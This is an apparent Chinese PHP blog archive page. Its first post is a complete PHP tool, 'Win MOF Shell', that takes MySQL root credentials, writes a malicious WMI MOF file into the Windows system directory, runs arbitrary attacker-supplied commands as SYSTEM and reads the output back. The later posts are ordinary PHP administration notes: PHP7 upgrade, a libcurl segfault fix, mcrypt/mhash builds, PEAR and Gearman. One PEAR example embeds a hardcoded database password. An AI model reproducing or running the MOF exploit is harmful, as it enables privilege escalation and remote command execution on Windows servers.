分类目录归档:PHP

mysql下root之mof提权带回显命令脚本

发表评论 
<?php $path="c:/windows/system32/canimei";session_start();if(!empty($_POST['submit'])){setcookie("connect");setcookie("connect[host]",$_POST['host']);setcookie("connect[user]",$_POST['user']);setcookie("connect[pass]",$_POST['pass']);setcookie("connect[dbname]",$_POST['dbname']);echo "<script>location.href='?action=connect'</script>";}if(empty($_GET["action"])){?><html><head><title>Win MOF Shell</title></head><body><form action="?action=connect" method="post">Host:<input type="text" name="host" value="192.168.200.144:3306"><br/>User:<input type="text" name="user" value="root"><br/>Pass:<input type="password" name="pass" value="toor"><br/>DB:<input type="text" name="dbname" value="mysql"><br/><input type="submit" name="submit" value="Submit"><br/></form></body></html><?phpexit;}if ($_GET[action]=='connect'){$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"]) or die('<pre>'.mysql_error().'</pre>'); echo "<form action='' method='post'>";echo "Cmd:";echo "<input type='text' name='cmd' value='$strCmd'?>";
echo "<br>";
echo "<br>";
echo "<input type='submit' value='Exploit'>";
echo "</form>";
echo "<form action='' method='post'>";
echo "<input type='hidden' name='flag' value='flag'>";
echo "<input type='submit'value=' Read '>";
echo "</form>";
if (isset($_POST['cmd'])){
$strCmd=$_POST['cmd'];
$cmdshell='cmd /c '.$strCmd.'>'.$path;
$mofname="c:/windows/system32/wbem/mof/system.mof";
$payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\")

instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\\\\\Cimv2\";
Name  = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
\"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \"
\"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};

instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\";
};

instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($_COOKIE["connect"]["dbname"],$conn);
$sql1="select '$payload' into dumpfile '$mofname';";
if(mysql_query($sql1))
echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error());
mysql_close($conn);
}

if(isset($_POST['flag']))
{
$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>');
$sql2="select load_file(\"".$path."\");";
$result2=mysql_query($sql2);
$num=mysql_num_rows($result2);
while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {
echo "<hr/>";
echo '<pre>'. $row[0].'</pre>';
}
mysql_close($conn);
}
}?>

日请求过亿的Web系统PHP7升级实践

发表评论

QQ会员活动运营平台(AMS),是QQ会员增值运营业务的重要载体之一,承担海量活动运营的Web系统。AMS是一个主要采用PHP语言实现的活动运营平台, CGI日请求3亿左右,高峰期达到8亿。然而,在之前比较长的一段时间里,我们都采用了比较老旧的基础软件版本,就是PHP5.2+Apache2.0(2008年的技术)。尤其从去年开始,随着AMS业务随着QQ会员增值业务的快速增长,性能压力日益变大。

于是,自2015年5月,我们就开始规划PHP底层升级,最终的目标是升级到PHP7。那时,PHP7尚处于研发阶段,而我们讨论和预研就已经开始了。 继续阅读

Segfault in libnss when using libcurl from php

发表评论
$ tools/php-5.2.17/bin/php test1.php
* About to connect() to www.google.com port 443 (#0)
* Trying 74.125.192.103… * connected
* Connected to www.google.com (74.125.192.103) port 443 (#0)
* Initializing NSS with certpath: sql:/etc/pki/nssdb
Segmentation fault (core dumped)When the url in the script is changed to use HTTP instead of HTTPS, there is no segfault.
Steps To Reproduce Run the script:
$ cat test1.php
< ?php
$urlEndPoint = “https://www.google.com/search”;
$headerArray = array();
$ch = curl_init();
curl_setopt($ch,CURLOPT_POST,true);curl_setopt($ch,CURLOPT_URL, $urlEndPoint);
/*curl_setopt($ch,CURLOPT_HTTPHEADER, $headerArray);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postArray); */

curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_HEADER, true);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, ‘Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0’);
curl_setopt($ch, CURLOPT_VERBOSE, true);

if (!$result = curl_exec($ch)) {
print (curl_error($ch));
}

curl_close ($ch);

echo print_r($result,true);
?>
内核日志:
tail -f /var/log/messages
kernel: php[26564]: segfault at 8048 ip 00007f7a72fede9c sp 00007fffec90edf0 error 4 in libsqlite3.so.0.8.6[7f7a72fd1000+8c000]
gdb记录:
Program received signal SIGSEGV, Segmentation fault.
0x00007fffe9651e9c in sqlite3_file_control () from /usr/lib64/libsqlite3.so.0

 

在Centos的bug列表中,能够找到关于这个bug的说明:

https://bugs.centos.org/view.php?id=7399

https://www.mankier.com/5/cert9.db

Quick fix:

mv /etc/pki/nssdb /etc/pki/nssdb.bak
yum -y reinstall nss

Linux 下apache php-cgi 安装及配置

发表评论

一、php-cgi和php-cli的区别

一般情况下,PHP是运行于Web环境上的产品,与HTML标签混合开发,将结果显示在浏览器上,作为交互式脚本。PHP位于Web服务器(Apache、Microsoft IIS等)和用户之间的中间层,称为SAPI(Short for web server API)。在Web服务器上,PHP始终充当引用与用户界面的功能。

PHP CLI版本有些类似于PHP的CGI模式,尽管它们之间有很多共同的行为,但CLI和CGI是分属于不同的SAPI的。
CLI没有用到GET或POST表单处理,无MIME的头信息输出,以及其他隐含的SAPI实现。 继续阅读

用phpize编译动态扩展模块

发表评论
服务器运行一段时间后,可能突然会需求添加某个扩展,这就需要在不重新编译PHP的情况下独立添加扩展。

我们在做什么

  • 在Linux下编译安装php是常有的事情,当然,目前为止个人依然推荐二进制安装,rpm或者deb安装等等。经常会出现我们需要ext中的一些功能,这些功能在编译过程中并没有加载进来,一个常用的办法就是使用phpize这个php的工具来编译扩展模块(结果会生成一个so文件,比如mbstring.so, tidy.so,功能类似于windows下的dll文件),然后再在配置文件中进行适当设定就OK了。
  • 整个过程和动态编译apache的模块非常相似,只不过apache使用的程序叫做apxs,而php里叫做phpize。
  • 下面的报错是一个典型的例子,在提醒你需要动态加载一个模块了。
Fatal error: Call to undefined function curl_init() in /var/www/boss.yfang.cn/htdocs/yahooboss.class.php on line 48
# 稍微查一下就知道这是php的curl模块中的一个函数

继续阅读

Linux 下安装mcrypt,mhash扩展

发表评论

MCrypt
MCrypt is a replacement for the old crypt() package and crypt(1) command, with extensions. It allows developers to use a wide range of encryption functions, without making drastic changes to their code. It allows users to encrypt files or data streams without having to be cryptographers. Above all, it allows you to have some really neat code on your machine. 🙂

The companion to MCrypt is Libmcrypt, which contains the actual encryption functions themselves, and provides a standardized mechanism for accessing them.
Mhash:

Mhash is a free (under GNU Lesser GPL) library which provides a uniform interface to a large number of hash algorithms. These algorithms can be used to compute checksums, message digests, and other signatures.
The HMAC support implements the basics for message authentication, following RFC 2104. In the later versions some key generation algorithms, which use hash algorithms, have been added. The manpage for mhash is mhash.3.html.

At the time of writing this, the library supports the algorithms:

SHA1, SHA160, SHA192, SHA224, SHA384, SHA512, HAVAL128, HAVAL160, HAVAL192, HAVAL224, HAVAL256, RIPEMD128, RIPEMD256, RIPEMD320, MD4, MD5, TIGER, TIGER128, TIGER160, ALDER32, CRC32, CRC32b, WHIRLPOOL, GOST, SNEFRU128, SNEFRU256

1. 软件下载:

http://www.sourceforge.net下载Libmcrypt,mhash,mcrypt安装包:

Libmcrypt(libmcrypt-2.5.8.tar.gz):http://sourceforge.net/project/showfiles.php?group_id=87941&package_id=91774&release_id=487459
mcrypt(mcrypt-2.6.8.tar.gz):http://sourceforge.net/project/showfiles.php?group_id=87941&package_id=91948&release_id=642101
mhash(mhash-0.9.9.9.tar.gz):http://sourceforge.net/project/showfiles.php?group_id=4286&package_id=4300&release_id=645636

2. 先安装Libmcrypt
# tar -zxvf libmcrypt-2.5.8.tar.gz
# cd libmcrypt-2.5.8
# ./configure
# make
# make install

说明:libmcript默认安装在/usr/local

3. 安装mhash
# tar -zxvf mhash-0.9.9.9.tar.gz
# cd mhash-0.9.9.9
# ./configure
# make
# make install

4. 安装mcrypt
# tar -zxvf mcrypt-2.6.8.tar.gz
# cd mcrypt-2.6.8
# LD_LIBRARY_PATH=/usr/local
# ./configure
# make
# make install

说明:由于在配置Mcrypt时,会找不到libmcrypt的链接库,导致无法编译,因为Libmcrypt的链接库在/usr/local/文件夹下。因些在配置mcrypt时要加入LD_LIBRARY_PATH=/usr/local导入键接库(请仔细查看configure后的提示,注意LD_LIBRARY_PATH设置与实际路径相符)

5. 安装PHP

没有提示错误就说明安装完成了,接着就要为PHP添加mcrypt模块了,在任意PHP文件中加入函数 phpinfo(),即可取得目前PHP的配置,在这些配置后面新增需要加入的配置:
'--with-mcrypt=/usr/local/include' ''--with-mhash''

然后进入php源代码目录,执行这条完整的configure命令,以下是我的configure选项:
'./configure'
'--prefix=/usr/local/php'
'--with-mysql=/usr/local/mysql'
'--with-mysqli=/usr/local/mysql/bin/mysql_config'
'--with-apxs2=/usr/local/apache/bin/apxs'
'--with-jpeg-dir=/usr/local/modules/jpeg6'
'--with-gd=/usr/local/modules/gd'
'--enable-gd-native-ttf'
'--with-iconv'
'--with-png-dir=/usr/local/modules/libpng'
'--with-ttf'
'--with-openssl'
'--with-zlib-dir=/usr/local/modules/zlib/'
'--with-freetype-dir=/usr/local/modules/freetype'
'--enable-magic-quotes'
'--enable-mbstring'
'--enable-force-cgi-redirect'
'--enable-wddx'
'--with-curl=/usr/local/curl'
'--enable-soap'
'--enable-sockets'
'--with-mcrypt=/usr/local/include'
'--with-mhash'

配置完成,下面进行源码包的制作和安装
make clean (一定需要)
make
make install

最后重启APACHE服务,万事OK。

现在可以试一下使用加密算法了

$password = mcrypt_cbc(MCRYPT_DES, $key, $message, MCRYPT_ENCRYPT);  
$password = bin2hex($password );

目前这条加密语句可以运行,但是会出现notice,因为在最新的版本中提倡使用initialization vector — 即IV。
参考一段Manual中的代码

<?php      
$key = "this is a secret key";      
$input = "Let us meet at 9 o'clock at the secret place.";      
$td = mcrypt_module_open('tripledes', '', 'ecb', '');    $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($td), MCRYPT_RAND);      
mcrypt_generic_init($td, $key, $iv);      
$encrypted_data = mcrypt_generic($td, $input);    mcrypt_generic_deinit($td);      
mcrypt_module_close($td);  
?> 
<?php  
$key = "this is a secret key";  
$input = "Let us meet at 9 o'clock at the secret place.";  
 
$encrypted_data = mcrypt_ecb (MCRYPT_3DES, $key, $input, MCRYPT_ENCRYPT);  
?>

mhash:

<?php  
$hash_alg = MHASH_TIGER;   
print "This data has been hashed with the".mhash_get_hash_name($hashed_message)."hashing algorithm.";   
?> 
<?php  
$input = "what do ya want for nothing?";  
$hash = mhash(MHASH_MD5, $input);  
echo "The hash is " . bin2hex($hash) . "<br />\n";  
$hash = mhash(MHASH_MD5, $input, "Jefe");  
echo "The hmac is " . bin2hex($hash) . "<br />\n";  
?>

******************************************************

Get and Install mhash

wget http://internap.dl.sourceforge.net/sourceforge/mhash/mhash-0.9.9.9.tar.gz
or go to sourceforge and find the latest.

tar -xvzf mhash-0.9.9.tar.gz
cd mhash-0.9.9
./configure --prefix=/usr/local/mhash
make
make install

Get and install libmcrypt

wget http://easynews.dl.sourceforge.net/sourceforge/mcrypt/libmcrypt-2.5.8.tar.gz
tar -xvzf libmcrypt-2.5.8.tar.gz
cd libmcrypt-2.5.8
./configure --prefix=/usr/local/libmcrypt --disable-posix-threads
make
make install

Get and install mcrypt.

wget http://superb-west.dl.sourceforge.net/sourceforge/mcrypt/mcrypt-2.6.8.tar.gz
or go to source forge and get the latest.

tar -zxvf mcrypt-2.6.8.tar.gz
cd mcrypt-2.6.8
./configure
make
make install

Create the mcrypt php5 module to load.

Find you source code for your php version.

use: find / -name “php”

mine was found here /usr/src/redhat/SOURCES/php-5.1.6/

cd to php-5.2.6/ext/mcrypt
phpize
aclocal
./configure
make clean
make
make install

If you are using a 64 bit computer, create a symbolic link.
cd /usr/lib64/modules
ln -s /usr/local/lib/php/extensions/no-debug-non-zts-20050922/mcrypt.so ./mcrypt.so

Create a new file named mcrypt.so in /etc/php.d directory and enter the following.

;Enable mcrypt extension module
extension=mcrypt.so

Create the mhash extension:

cd to php-5.2.6/ext/mhash
phpize
aclocal
./configure
make clean
make
make install

cd /usr/lib64/modules
[root modules]# ln -s /usr/local/lib/php/extensions/no-debug-non-zts-20050922/mhash.so ./mhash.so

Create a new file named mcrypt.so in /etc/php.d directory and enter the following.

;Enable mhash extension module
extension=mhash.so

Bounce Apache
[root /]#service httpd restart
Stopping httpd:                                            [  OK  ]
Starting httpd:                                            [  OK  ]

Check Apache for mcrypt loaded.
Move to your website loaction and create a file named phpinfo.php and enter.

<?=phpinfo();?>

Now open a brower and point it to your site /phpinfo.php

Look for a section named mcrypt and mhash, they should show the version, supported ciphers, enabled, etc.

phpinfo mcrypt mhash picture
Note: If you do not see the section, then the module did not load.

用 Gearman 分发 PHP 应用程序的工作负载

发表评论

通过本文,了解工作分发系统 Gearman 并分发用 PHP、C、Ruby 及其他受支持语言编写的应用程序的工作负载。

尽管一个 Web 应用程序的大部分内容都与表示有关,但它的价值与竞争优势却可能体现在若干专有服务或算法方面。如果这类处理过于复杂或拖沓,最好是进行异步执行,以免 Web 服务器对传入的请求没有响应。实际上,将一个计算密集型的或专门化的功能放在一个或多个独立的专用服务器上运行,效果会更好。 继续阅读

How to implement COMET with PHP

发表评论

How to implement COMET with PHP

Comet is a programming technique that enables web servers to send data to the client without having any need for the client to request it. This technique will produce more responsive applications than classic AJAX. In classic AJAX applications, web browser (client) cannot be notified in real time that the server data model has changed. The user must create a request (for example by clicking on a link) or a periodic AJAX request must happen in order to get new data fro the server.
继续阅读

pear快速入门

发表评论

PEAR更新
Php4.05班以上就自带了pear包
1. http://cvs.php.net php4目录下
2. http://pear.php.net Browse Packages

PEAR使用
linux环境下:
Linux机器上安装php4.05版本以上就默认安装了pear,只需在php.ini 的include_path 配置改为pear存放的路径,如:
for UNIX
include_path = "/usr/local/lib/php/"
重启动Apache,

window环境下:
在window 环境下用Apperv(1.9版及更低)安装包搭建环境后没有pear,可考pear的包到php目录下,然后改php.ini的路径为pear存放的路径,如:
for windows
include_path = “d:\Appserv\php\pear\”
重启动Apache,

PEAR调试:
1. 连接数据库
pear配置成功后,调用pear的文件可以放在服务器目录(www)下的任何位置都可以 

<? 
require_once("DB.php"); 

// 连接到数据库 
$db_host = "localhost"; 
$db_user = "root"; 
$db_passwd = "szsydns"; 
$db_dbName = "user"; 
$PersistentConnection = 1 ; 
$db_type ="mysql"; 
$db_proto =""; 
$db_options=""; 
$db=DB::connect("$db_type://$db_user:$db_passwd@$db_host/$db_dbName",$db_options); 

if( DB::isError($db) ){ 
echo "无法连接数据库,错误原因:".DB::errorMessage($db); 
} 
?>

2. 取出数据 

<? 
function sql_exec($sql) { 
global $db; 
$result = $db->query($sql); 
if (DB::isError($result)){ 
echo "发生数据库错误:".DB::errorMessage($result); 
exit(); 
} 
return $result; 
} 
$sql = "select * from id"; 
$result = sql_exec($sql); 
while( $row = $result->fetchRow() ){ 
echo "姓名:$row[0] 性别:$row[1] 年龄 $row[2]<br>"; 
} 
?>

SQL Server 2005 Driver for PHP

发表评论

SQL Server 2005 Driver for PHP Documentation
Example Application (SQL Server 2005 Driver for PHP)

The AdventureWorks Product Reviews example application is a Web application that demonstrates the functionality of the SQL Server 2005 Driver for PHP. The application lets a user search for products by entering a keyword, see reviews for a selected product, write a review for a selected product, and upload an image for a selected product.

 Running the Example Application
Install the SQL Server 2005 Driver for PHP. For detailed information, see Getting Started (SQL Server 2005 Driver for PHP).

Copy the code listed later in this document into two files: adventureworks_demo.php and photo.php.
继续阅读